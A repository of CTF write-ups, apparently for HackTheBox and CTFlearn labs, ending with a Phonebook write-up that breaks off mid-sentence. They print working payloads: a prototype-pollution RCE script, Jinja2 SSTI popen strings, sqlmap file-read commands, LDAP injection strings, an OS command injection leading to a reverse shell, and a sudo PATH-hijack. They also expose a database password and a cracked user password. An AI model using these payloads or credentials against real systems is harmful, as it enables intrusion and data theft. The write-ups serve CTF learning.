"/Interview_practice/Python_intertview_arrays.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "#question from 'Elements of Programming Interview in Python'\n#Chapter 5 pg. 41\n#Arrays\n\n" }, { "alpha_fraction": 0.5533718466758728, "alphanum_fraction": 0.5807321667671204, "avg_line_length": 25.489795684814453, "blob_id": "713bb27864c0625acfd43784b9b4fa538dd716dd", "content_id": "762c2ba96c3ae26941b9336355f4ecbbeda53fb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2595, "license_type": "no_license", "max_line_length": 117, "num_lines": 98, "path": "/migration_test.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom config import Config\n\nfrom numpy import genfromtxt\n\nimport os\n\n#basedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\n\napp.config.from_object(Config)\n#app.comfig['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////C/Users/icprbadmin/Documents/Python_Scripts/Workflow_py/test.db'\n\n#SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'test.db')\n\n#SQLALCHEMY_TRACK_MODIFICATIONS = False\n\ndb = SQLAlchemy(app)\nmigrate = Migrate(app,db)\n\n\n#models\n\nclass Data(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n year = db.Column(db.Integer)\n month = db.Column(db.Integer)\n res = db.Column(db.Integer)\n solids = db.Column(db.Integer)#Bool\n NTU = db.Column(db.Integer)#Bool\n org_mal = db.Column(db.Integer)#Bool\n MPN_100ml = db.Column(db.Integer)#Bool\n MPN_100ml_1 = db.Column(db.Integer)#Bool\n LosR = db.Column(db.Float)\n Silica = db.Column(db.Float)\n Ca = db.Column(db.Float)\n Mg = db.Column(db.Float)\n Ca_Mg = db.Column(db.Float)\n NO3 = db.Column(db.Float)\n NO3_USGS = db.Column(db.Float)\n Cl2 = db.Column(db.Float)\n Na = db.Column(db.Float)\n SO4 = db.Column(db.Float)\n K = db.Column(db.Float)\n pH = db.Column(db.Float)\n Alk = db.Column(db.Float)\n Hard = db.Column(db.Float)\n Nhard = db.Column(db.Float)\n C_USGSTemp = db.Column(db.Float)\n F_USGS = db.Column(db.Float)\n Temp = db.Column(db.Float)\n MD_Precip_inch_mon = db.Column(db.Float)\n MD_Temp_F = db.Column(db.Float)\n\n\ndef Load_Data(file_name):\n data = genfromtxt(file_name, delimiter=',', skip_header=1, converters={0: lambda s: str(s)})\n return data.tolist()\n\nfile_name = \"data/Reservoir_intake_retweaked.csv\"\ndata = Load_Data(file_name)\n\n#this needs to be adapted to flask-migrate structure\nfor i in data:\n record = Data(**{\n 'year': i[1],\n 'month': i[2],\n 'res': i[3],\n 'solids': i[4],\n 'NTU': i[5],\n 'org_ml': i[6],\n 'MPN_100ml': i[7],\n 'MPN_100ml_1': i[8],\n 'LosR': i[9],\n 'Silica': i[10],\n 'Ca': i[11],\n 'Mg': i[12],\n 'Ca_Mg': i[13],\n 'NO3': i[14],\n 'NO3_USGS': i[15],\n 'Cl2': i[16],\n 'Na': i[17],\n 'SO4': i[18],\n 'K': i[19],\n 'pH': i[20],\n 'Alk': i[21],\n 'Hard': i[22],\n 'Nhard': i[23],\n 'C_USGSTemp': i[24],\n 'F_USGS': i[25],\n 'Temp': i[26],\n 'MD_Precip_inch_mon': i[27],\n 'MD_Temp_F': i[28]\n })\n\n#print(record)" }, { "alpha_fraction": 0.5202822089195251, "alphanum_fraction": 0.5626102089881897, "avg_line_length": 23.69565200805664, "blob_id": "7e7cf98bcd569c21950cc8869d7b3662c30e2d43", "content_id": "cfeb61f1284d871c9df8241eb5b7ab400e9c9e65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 97, "num_lines": 23, "path": "/pandas_play.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "import pandas as pd\n\ntest_data = {'t1': ['test1test','test2test'],\n 't2': ['testone','testtwo']\n }\n\n\ndata_df = pd.DataFrame(data=test_data)\n#print(data_df)\ndata_df['t3']= [data_df.iloc[0,0][-5:-4],data_df.iloc[1,0][-5:-4]]\n# test = data_df.iloc[0,1]\n# print(test)\n\ndata_df =pd.concat([data_df,pd.DataFrame(columns=(\"coltest1\", \"coltest2\") ##(columns=list('ABCD')\n )], sort=False)\n\nbutter = 333\n\ndata_df.iloc[0, data_df.columns.get_loc('t2')] = butter\n\ndata_df['coltest1'] = data_df['t1']\n\nprint(data_df)" }, { "alpha_fraction": 0.708563506603241, "alphanum_fraction": 0.7444751262664795, "avg_line_length": 23.16666603088379, "blob_id": "e95f7c52167375d0f4324a7c83221928083e9a60", "content_id": "f9d4b5cbf1af3e0e4216a89e10b8bd4ba450ca35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 724, "license_type": "no_license", "max_line_length": 71, "num_lines": 30, "path": "/win32com_test.py", "repo_name": "ShyGuyPy/Workflow_py", "src_encoding": "UTF-8", "text": "import win32com.client\nimport win32gui as wg\nimport win32con\nimport time\n\nprog_ID = \"Extend.application\"\nwin_ID = \"ExtendSim\"\n\nes_handle = win32com.client.Dispatch(prog_ID)\nprint(es_handle)\n\napp_ID = wg.FindWindow(None, win_ID)\nprint(app_ID)\n\n#time.sleep(10)\n\nwg.ShowWindow(app_ID, win32con.SW_MAXIMIZE)\n#time.sleep(5)\nwg.ShowWindow(app_ID, win32con.SW_MAXIMIZE)\n#es_handle.Execute(\"\"\"ActivateApplication()\"\"\")\n\n#brings specified worksheet to forefront\n#es_handle.Execute(\"\"\"ActivateWorksheet(\"test_model.mox\")\"\"\")\n\n#set the run parameters SetEndTime, SetStartTime, SetNumSim, SetNumStep\n#es_handle.Execute(\"\"\" SetRunParameters(10000, 0 , 1, 1) \"\"\")\nes_handle.Execute(\"\"\"ShowFunction-Help(1)\"\"\")\n\n\n# python win32com_test.py" } ]
9
Jjrex8988/Python_Project_DS_Multiple_Linear_Regression
https://github.com/Jjrex8988/Python_Project_DS_Multiple_Linear_Regression
3e25d335d26786afe27947d7f92b9bb3b0493588
68adab00b67df0b47d712cd9bd52a4161be732bc
dde2d74ced67f8f1ee7a7b58787edf9e4c6214cf
refs/heads/master
2023-05-09T12:27:47.319942
2021-06-02T15:04:50
2021-06-02T15:04:50
373,208,973
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6676572561264038, "alphanum_fraction": 0.6958890557289124, "avg_line_length": 26.283782958984375, "blob_id": "8e2cdc88786d4ea85c9196e108384cf96327a537", "content_id": "afb7eca569236db1f77c80e9fe1c890f5c2c25c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2019, "license_type": "no_license", "max_line_length": 97, "num_lines": 74, "path": "/multiple_linear_regression_backward_elimination.py", "repo_name": "Jjrex8988/Python_Project_DS_Multiple_Linear_Regression", "src_encoding": "UTF-8", "text": "# Multiple Linear Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, -1].values\nprint(X)\nprint('-' * 38)\n\n# Encoding categorical data\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.preprocessing import OneHotEncoder\n\nct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [3])], remainder='passthrough')\nX = np.array(ct.fit_transform(X))\nprint(X)\nprint('-' * 38)\n\n# Avoiding the Dummy Variable Trap (Backward Elimination)\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\n\n# Training the Multiple Linear Regression model on the Training set\nfrom sklearn.linear_model import LinearRegression\n\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# Predicting the Test set results\ny_pred = regressor.predict(X_test)\n\n\n# Building a model (Backward Elimination)\nimport statsmodels.api as sm\n\nX = np.append(arr=np.ones((50, 1)).astype(int), values=X, axis=1)\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 1, 3, 4, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 3, 4, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 3, 5]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n\nX_opt = X[:, [0, 3]]\nX_opt = X_opt.astype(np.float64)\nregressor_OLS = sm.OLS(endog=y, exog=X_opt).fit()\nprint(regressor_OLS.summary())\nprint('-' * 38)\n" } ]
1
cabdi13/CTF-writeups
https://github.com/cabdi13/CTF-writeups
59689e24106dd025038357e99e88d84924ca60ac
51ff0c841b5096833f4242f5a5caaed3000cbe04
db6600e38518650f584bc83568dfae1497cc7bf8
refs/heads/main
2023-09-05T02:56:49.830937
2021-11-18T17:56:18
2021-11-18T17:56:18
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6602303385734558, "alphanum_fraction": 0.663279116153717, "avg_line_length": 37.33766174316406, "blob_id": "102be4459c28a12fa8616ddd21962b62e88cdab4", "content_id": "1504aeab1c389b6c453419c8266f5813328ce447", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2952, "license_type": "permissive", "max_line_length": 258, "num_lines": 77, "path": "/HackTheBox/challenges/web/Gunship/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Gunship\nThis is a beautiful and simple node web application that contains only one user input And vulnerability \nmay be at this point.\n\n<p align=\"center\">\n<img src=\"./images/Screenshot.png\">\n</p>\n\nInspection of the source code reveals a comment that hints towards the exploit being caused by prototype pollution in unflatten.\n\n> unflatten seems outdated and a bit vulnerable to prototype pollution we sure hope so that po6ix doesn't pwn our puny app with his AST injection on template engines\n\n```js\nconst path = require('path');\nconst express = require('express');\nconst handlebars = require('handlebars');\nconst { unflatten } = require('flat');\nconst router = express.Router();\n\nrouter.get('/', (req, res) => {\n return res.sendFile(path.resolve('views/index.html'));\n});\n\nrouter.post('/api/submit', (req, res) => {\n\t// unflatten seems outdated and a bit vulnerable to prototype pollution\n\t// we sure hope so that po6ix doesn't pwn our puny app with his AST injection on template engines\n\n const { artist } = unflatten(req.body);\n\n\tif (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {\n\t\treturn res.json({\n\t\t\t'response': handlebars.compile('Hello {{ user }}, thank you for letting us know!')({ user:'guest' })\n\t\t});\n\t} else {\n\t\treturn res.json({\n\t\t\t'response': 'Please provide us with the full name of an existing member.'\n\t\t});\n\t}\n});\n\nmodule.exports = router;\n```\nSome google-fu leads us pretty quickly to the following site with a POC by posix on a protype pollution in AST : [AST Injection, Prototype Pollution to RCE](https://blog.p6.is/AST-Injection/#Exploit)\n\nThe proof of concept from the site above only required minor changes in order to get command execution. Note that bash is not available inside the docker container, we could use sh instead but as we only need to grab the flag we can just use simple commands.\n\n\n```python\nimport requests\n\nURL = '[URL]'\n\n# make pollution\nr = requests.post(URL+'/api/submit', json = {\n \"artist.name\":\"Gingell\",\n \"__proto__.type\": \"Program\",\n \"__proto__.body\": [{\n \"type\": \"MustacheStatement\",\n \"path\": 0,\n \"params\": [{\n \"type\": \"NumberLiteral\",\n \"value\": \"process.mainModule.require('child_process').execSync(`whoami > /app/static/out`)\"\n }],\n \"loc\": {\n \"start\": 0,\n \"end\": 0\n }\n }]\n })\nprint(requests.get(URL+'/static/out').text)\n```\n\nThe command execution is blind, however as we know that the path to the static folder is `/app/static` we can write files into this path and then request them to see the output.\n\nA quick `ls > /app/static/out` and browsing to `/static/out` shows that there is a flag in the current folder.\n\nChanging the command to `cat flag* > /app/static/out` and browsing to `/static/out` again gives us the flag : `HTB{wh3n_l1f3_******_***_**_*****_*********_****_*****}`\n" }, { "alpha_fraction": 0.6844589710235596, "alphanum_fraction": 0.7002542018890381, "avg_line_length": 23.48444366455078, "blob_id": "043a3642833a3c1268f1240c94fbc7ccaf454f0c", "content_id": "5e0cf8241af5d8c0ddde0138e4301f0098bbe69c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5517, "license_type": "permissive", "max_line_length": 140, "num_lines": 225, "path": "/HackTheBox/machines/Previse/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Previse\n\nThe first thing we're going to do is run the Nmap scan \n```\nnmap -sC -sV [IP]\n```\n<p align=\"center\">\n<img src=\"./images/01.jpg\">\n</p>\n\nAs a result of this Nmap scan, I discovered a port `22 SSH` and 80\n\n<p align=\"center\">\n<img src=\"./images/02.jpg\">\n</p>\n\nNext, I used `gobuster` to brute force the directory.\n\n```bash\ngobuster dir -u http://10.10.11.104 -w ./directory-list-2.3-medium.txt -x php\n```\n\nA list of routes can be found in the image below:\n\n<p align=\"center\">\n<img src=\"./images/03.jpg\">\n</p>\n\nFurthermore, I have discovered an interesting directory which is `nav.php`, while analyzing this report.\n\nTherefore, I found that it is possible to `create an account` in this directory.\n\n<p align=\"center\">\n<img src=\"./images/04.jpg\">\n</p>\n\nThis website allows the creation of accounts but this page has been redirected to `login.php`\n\nSo I created an account using tricks, and I'll explain to you how I did it.\n\nTo begin, I have opened the `burpsuite` tool to capture the request.\n\nI have captured the request\n\nnext right-click the mouse you get the `do intercept` option and click the response to this request\n\n<p align=\"center\">\n<img src=\"./images/05.jpg\">\n</p>\n\nAnd the send `request to response`\n\nYou now get a response in the burpsuit and change the status code from `302` to `200 Ok`. \n\nThis trick will change `302` to `200` in the request and send the response to the browser \n\n<p align=\"center\">\n<img src=\"./images/06.jpg\">\n</p>\n\nNow you can see that we can `create an account` on the website.\n\nCreate a username and password according to your wishes.\n\n<p align=\"center\">\n<img src=\"./images/07.jpg\">\n</p>\n\nNext, we going to login into the website using a `username` and `password`\n\n<p align=\"center\">\n<img src=\"./images/02.jpg\">\n</p>\n\n> Now we are successfully login into the site \n\nNext, we clicked on the `file menu`, where we found `sitebackup.zip`, which is interesting.\n\n<p align=\"center\">\n<img src=\"./images/08.jpg\">\n</p>\n\nSo download the file and extract it.\n\nWe got some interesting `PHP` files.\n\nFurther analyzing this I got two interesting files which are `config.php` and logs.php.\n\n```php\n<?php\n\nfunction connectDB(){\n $host = 'localhost';\n $user = 'root';\n $passwd = 'mySQL_p@ssw0rd!:)';\n $db = 'previse';\n $mycon = new mysqli($host, $user, $passwd, $db);\n return $mycon;\n}\n\n?>\n```\nWe get the username and password for the MySQL database in `config.php`.\n\nNext to another file is `logs.php` in this file I got the one vulnerability which is `os command injection`.\n\n```php\n$output = exec(\"/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}\");\necho $output;\n\n$filepath = \"/var/www/out.log\";\n$filename = \"out.log\"; \n```\n\nThe file contains a delimiter and has not been sanitized properly, which allows us to execute `os command injections`.\n\nSo first go to that website and click the `management menu` and there is a `file log`.\n\nEnter to file log you can able to see the delimiter. so capture this request in a burpsuit.\n\n<p align=\"center\">\n<img src=\"./images/09.jpg\">\n</p>\n\nBefore that start the netcat\n```\nnc -nlvp 1234\n```\nSo injected the downloaded payload in the delimiter which is shown in the image.\n\n<p align=\"center\">\n<img src=\"./images/10.jpg\">\n</p>\n\nNow you get the shell in the `netcat`.\n\nupgrade shell : \n```\npython -c 'import pty; pty.spawn(\"/bin/sh\")'\n```\nor\n```\necho os.system('/bin/bash')\n```\nNext, we going to search username and password in the `MySQL` database \n\nWe got one interesting file in the site backup folder which is `config.php`\n\nIn this file, there is a username and password, and a database also.\n```\nmysql -u root -D previse -p\n```\nNow it will ask the password so enter the password `mySQL_p@ssw0rd!:)`\n\nNow you can able to enter it into in MySQL database.\n<p align=\"center\">\n<img src=\"./images/11.jpg\">\n</p>\nYes the hash password of the user we just found. I decoded the hash code. I’ll post it here as an exception for friends with weak machines. \n\n`$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.` = `ilovecody112235!` \n\nNow that we have found our user information, let’s connect with the ssh port.\n```\nssh [email protected]\n```\n<p align=\"center\">\n<img src=\"./images/12.jpg\">\n</p>\n\n## Privilege Escalation\n\nNow, let’s see what command this user can run using `sudo`\n> sudo -l\n\n<p align=\"center\">\n<img src=\"./images/13.jpg\">\n</p>\n\nOn catting the file presented I got below result.\n```shell\n#!/bin/bash\n\n# We always make sure to store logs, we take security SERIOUSLY here\n\n# I know I shouldnt run this as root but I cant figure it out programmatically on my account\n# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time\n\ngzip -c /var/log/apache2/access.log > /var/backups/$(date --date=\"yesterday\" +%Y%b%d)_access.gz\ngzip -c /var/www/file_access.log > /var/backups/$(date --date=\"yesterday\" +%Y%b%d)_file_access.gz\n```\nFurther analyzing the file I have found a vulnerability which is path injection\nSo now enter into the tmp folder.\n\nTransfer the payload and the payload should be in the name of `gzip`.\n\nbefore that set the listener in our local machine\n\n> ncat -lvnp 4321\n\nNext, go to the machine and enter the below command\n\nFirst, enter the payload shown in the below image\n\n<p align=\"center\">\n<img src=\"./images/14.jpg\">\n</p>\n\n```shell\nexport PATH=/tmp:$PATH\n```\nOR \n\n```shell\nexport PATH=$(pwd):$PATH\n```\n\nThen enter the following command\n> sudo /opt/scripts/access_backup.sh\n\nAnd here we got root shell.\n\n<p align=\"center\">\n<img src=\"./images/15.jpg\">\n</p>" }, { "alpha_fraction": 0.6762114763259888, "alphanum_fraction": 0.6883260011672974, "avg_line_length": 31.428571701049805, "blob_id": "5379a7dc8b6d91f6316157ca0da7afe4c1b49858", "content_id": "edc2f06f92f89850401b65001fd321cc4b0c01c4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1816, "license_type": "permissive", "max_line_length": 135, "num_lines": 56, "path": "/HackTheBox/challenges/web/Templated/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Templated\n\n> Upon accessing the web instance, we will see this interface\n\n```\nSite still under construction\nProudly powered by Flask/Jinja2\n```\nThe message already informs us that the page is built using Flask / Jinja2.\n\nTo test this further, I will introduce routes in the url.\n\nI got a `404` error but notice what we entered as path in URL is getting rendered in the website. Here are a few `XSS` payloads.\n\n```\n<script>alert(\"hello\")</script>\n```\nIf you try this pyload, you will not get any results.\n\nBut the following pyload is executed :\n\n```\n<img src=! onerror=\"alert('hello')\">\n```\n\n# Server Side Template Injection (SSTI)\n\nAs a result, we know that the web is vulnerable to `XSS` payloads, but this did not lead us to the flag.\n\nAssuming that the challenge is titled `Templated` and that `Jinja2` is a web template engine for Python.\n\nThere might be a vulnerability related to `SSTI` (`Server Side Template Injection`).\n\nPayload : `{{46+46}}`\n\nOutput : it give `92` as output\n\nCurrently 2 vulnerabilities have been found, `SSTI` and `XSS` (`Reflected`)\n\nHere is an article regarding SSTI problems with [Flask and Jinja](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)\n\nBy using `__mro__ ` or `mro()` in Python, we can go back up the tree of inherited objects.\n\nWe can use the `MRO` function to display classes with the following payload\n\n```\n{{\"\".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[\"__builtins__\"][\"__import__\"](\"os\").popen(\"ls *\").read()}}\n```\n\nThe list shows all the files, and guess what we can see is `flag.txt`. Now we just need to replace `ls *` with `cat flag.txt`.\n\n```\n{{\"\".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[\"__builtins__\"][\"__import__\"](\"os\").popen(\"cat flag.txt\").read()}}\n```\n\nWe have finally obtained the flag. (^!^)\n" }, { "alpha_fraction": 0.7082380056381226, "alphanum_fraction": 0.7265446186065674, "avg_line_length": 96.11111450195312, "blob_id": "8bef76d704f9d9d8bb00cfc0c12dea30d63473a3", "content_id": "69896c621720245c18bd0396dfa13d25aa6639cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4380, "license_type": "permissive", "max_line_length": 312, "num_lines": 45, "path": "/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# CTF Write-ups\n<p align=\"center\">\n<img src=\"./resources/images/logo.png\">\n<br>\n<i>Writeups Challenges I have solved</i>\n</p>\n\nYou can see all the writeups here : <a href=\"https://hsnhk.gitbook.io/ctf-writeups/\">gitbook</a>\n\n* [CTF-writeups](https://github.com/HSNHK/CTF-writeups)\n * [Hack The Box](#hack-the-box)\n * [CTF learn](#ctf-learn)\n * [Try Hack Me](#tryhackme)\n\n# Hack The Box\n| Name | Type | Descriptions | Writeup | \n| ----- | ---- | ------------ | ------- |\n| Previse | Machine | <img src=\"./resources/images/Previse_Machine_Banner.JPG\" height=\"110px\" style=\"border-radius: 30px; padding-top: 10px\"> | [Writeup](HackTheBox/machines/Previse) |\n| Toxic | Web | Humanity has exploited our allies, the dart frogs, for far too long, take back the freedom of our lovely poisonous friends. Malicious input is out of the question when dart frogs meet industrialisation. 🐸 | [Writeup](HackTheBox/challenges/web/Toxic) | \n| Emdee five for life | Web | Can you encrypt fast enough? | [Writeup](HackTheBox/challenges/web/Emdee-five-for-life) |\n| FreeLancer | Web | Can you test how secure my website is? Prove me wrong and capture the flag! | [Writeup](HackTheBox/challenges/web/FreeLancer) |\n| Templated | Web | Can you exploit this simple mistake? | [Writeup](HackTheBox/challenges/web/Templated) |\n| Impossible Password | Reversing | Are you able to cheat me and get the flag? | [Writeup](HackTheBox/challenges/reversing/Impossible-Password) |\n| Illumination | Forensics | A Junior Developer just switched to a new source control platform. Can you find the secret token? | [Writeup](HackTheBox/challenges/forensics/Illumination) |\n| Phonebook | Web | Who is lucky enough to be included in the phonebook? | [Writeup](HackTheBox/challenges/web/Phonebook) |\n| baby ninja jinja | Web | The elders of the village summoned you to take the reigns after the recent death of you father. It's time to end the emperor's gruesome tyranny. | [Writeup](HackTheBox/challenges/web/baby-ninja-jinja) |\n| Gunship | Web | A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world... all the wooing in the world to make you feel more lonely... this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶 | [Writeup](HackTheBox/challenges/web/Gunship) |\n\n# CTF learn\n| Name | Type | Descriptions | Writeup | \n| ----- | ---- | ------------ | ------- |\n| Inj3ction Time | Web | I stumbled upon this website: http://web.ctflearn.com/web8/ and I think they have the flag in their somewhere. UNION might be a helpful command | [Writeup](CTFlearn/web/Inj3ction-Time) |\n| Calculat3 M3 | Web | Here! http://web.ctflearn.com/web7/ I forget how we were doing those calculations, but something tells me it was pretty insecure. | [Writeup](CTFlearn/web/Calculat3-M3) |\n\n# Tryhackme\n| Name | Type | Descriptions | Writeup | \n| ----- | ---- | ------------ | ------- |\n| Basic Malware RE | Room | This room aims towards helping everyone learn about the basics of “Malware Reverse Engineering”. | [Writeup](https://hsnhk.medium.com/tryhackme-basic-malware-re-bfcd518fd314) |\n| Reversing ELF | Room | Room for beginner Reverse Engineering CTF players. | [Writeup](https://hsnhk.medium.com/tryhackme-reversing-elf-60ab96969e41) |\n| Reverse Engineering | Room | This room focuses on teaching the basics of assembly through reverse engineering. | [Writeup](https://hsnhk.medium.com/tryhackme-reverse-engineering-9cd408849f13) |\n| Blue | Machine | Deploy & hack into a Windows machine, leveraging common misconfigurations issues. | [Writeup](https://hsnhk.medium.com/tryhackme-blue-1ccfae7c2e8a) |\n| OWASP Top 10 | Room | Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. | [Writeup](https://hsnhk.medium.com/tryhackme-owasp-top-10-e2b342c4f9f8) |\n| Nmap Room | Room | An in depth look at scanning with Nmap, a powerful network scanning tool. | [Writeup](https://hsnhk.medium.com/tryhackme-nmap-room-9db134d5c8cc) |\n| The find command | Room | A learn-by-doing approach to the find command. | [Writeup](https://hsnhk.medium.com/tryhackme-the-find-command-d64026d89c3) |\n| Disk Analysis & Autopsy | Forensic | Ready for a challenge? Use Autopsy to investigate artifacts from a disk image. | [Writeup](https://hsnhk.medium.com/tryhackme-disk-analysis-autopsy-f967c64feaf1) |\n" }, { "alpha_fraction": 0.7369308471679688, "alphanum_fraction": 0.7411466836929321, "avg_line_length": 56.878047943115234, "blob_id": "0ceefc819b6209d55264336a633a2d3a08d6dfff", "content_id": "a62881467d24aba14c817f2e79d5f6c16e5b35cc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2372, "license_type": "permissive", "max_line_length": 281, "num_lines": 41, "path": "/HackTheBox/challenges/web/FreeLancer/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# FreeLancer\nIf you look at the page code, you will come across such commented codes :\n```html\n<!-- <a href=\"portfolio.php?id=1\">Portfolio 1</a> -->\n```\n>`[Address]` means challenge address because this address may be different for each participant. We used this symbol to indicate the challenge address.\n\nlike a lot of comments with pages to look at and that the portfolio is using the URL parameters. These all might be exploit points.\n\nIf we look at the page `[Address]/portfolio.php?id=1?` we can see that it is just that image that was shown on the home page, a label, and some filler text.\n\n<p align=\"center\">\n<img src=\"./image/img1.png\">\n<br>\nIf I visit other ID numbers the first 3 are all the same and the fourth and up are just images with no text.\n</p>\n\nIf again and try a few different inputs I find that anything other than a \";\" returns just the image with no text but if I used the \";\" then I get the text back. Now I want to try something a little more so I am going to move on to SQLMap to make this quicker.\n\n\nFor SQLmap I am going to run `python sqlmap.py -u [Address]/portfolio.php?id=1 --tables` which gave me 4 databases: `performance_schema`, `mysql`, `information_schema`, and `freelancer`. Freelance looks like the one we want and it has two tables in it: `portfolio` and `safeadmin`.\n\nNow that I know the tables I am going to change my query with SQLmap to `python sqlmap.py -u [Address]/portfolio.php?id=1 -T safeadmin --dump` to specify that I know the Table and I want to dump its contents. \n\n> `It seemed that we would not get results with this method`\n\nRunning ZAP did produce a file of `/administrat` that was not linked on the site and when I went there it was an admin login page.\n\n<p align=\"center\">\n<img src=\"./image/img2.png\">\n</p>\n\nI found two PHP files named `logout.php` and `panel.php` but the server does not allow us to access them.\nTo be able to download these files and view their source code, we can use sqlmap.\n\nUsually the pages are stored in the `/var/www/html` path. You can use this method to download the files :\n```\npython sqlmap.py -u [Address]/portfolio.php?id=1 --file-read=/var/www/html/administrat/panel.php\n```\nAfter downloading the file, if you go to path `/.sqlmap/output/[Address]` in your system\nYou will see the downloaded file here and if you look at the code of this file you will see that there is a flag." }, { "alpha_fraction": 0.566679835319519, "alphanum_fraction": 0.6667985916137695, "avg_line_length": 25.06185531616211, "blob_id": "79f7ec3edd050993f2c8a3e38e42190b2efa2f45", "content_id": "b134f6798b24965d11d58e730254e13fdd94a3c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2533, "license_type": "permissive", "max_line_length": 143, "num_lines": 97, "path": "/HackTheBox/challenges/web/Phonebook/README.md", "repo_name": "cabdi13/CTF-writeups", "src_encoding": "UTF-8", "text": "# Phonebook\n\nWhen we see the login form on the website, it might be command injection, `SQL injection`, `LDAP injection`. \n\nWe can see that this need us to login with workstation username, it might be `LDAP injection`.\n<p align=\"center\">\n<img src=\"./images/login.png\">\n</p>\nThis is an example of `LDAP injection` payload. We can check for vulnerabilities.\n\n```\nuser=*)(&\npassword=*)(&\n--> (&(user=*)(&)(password=*)(&)) \n\n```\n<p align=\"center\">\n<img src=\"./images/inject.png\">\n</p>\nOur response showed successful, and a search box appeared when we clicked the button.\n\nThen we type a character in the search box, and it returns some user phonebook information. I tried `flag`, `HTB`, it doesn't find any results.\n> If you search for `space`, you will see such information\n```\nKyle Reese\[email protected]\t555-1234567\nEllery Hun\[email protected]\t317-959-9562\nMadelaine Lush\[email protected]\t636-918-1006\nCurrey Conti\[email protected]\t529-673-3935\nChaim Smoth\[email protected]\t895-974-4117\nEldin Jelf\[email protected]\t363-426-3563\nGanny Marti\[email protected]\t796-793-6925\nJobey Olley\[email protected]\t607-345-0290\nKatalin Wilde\[email protected]\t414-839-2681\nStinky Trood\[email protected]\t933-416-1003\nTab Zoren\[email protected]\t360-678-3613\nUrsula Beer\[email protected]\t794-396-6882\nBryan Arman\[email protected]\t640-255-8092\nBabette Cunio\[email protected]\t709-363-0223\nBerget Novis\[email protected]\t780-278-2572\nCed Engley\[email protected]\t230-780-1999\nCaryn Germon\[email protected]\t967-789-6335\nDevina Alcide\[email protected]\t828-947-3484\nDionne Lammas\[email protected]\t824-561-5676\nEmmalynn Burnup\[email protected]\t148-856-7052\nFredericka Hanks\[email protected]\t762-337-5667\nHannah Inder\[email protected]\t315-711-6454\nJay Sharma\[email protected]\t893-382-5236\nLilyan Crepel\[email protected]\t851-980-1038\n...\n```\nThen we try to find user `Reese`, but the information doesn't look like flag.\n\noutput : `Kyle Reese\[email protected]\t555-1234567`\n\nThen we change our `payload` to check if the password is the flag.\n\n```\nuser=Reese\npassword=HTB*)(&\n--> (&(user=Reese)(password=HTB*)(& \n```\nThis indicates that the payload logs into the web successfully with the payload!\n\n> `The password is the flag!`\n\n## Brute force\n\nWe need to 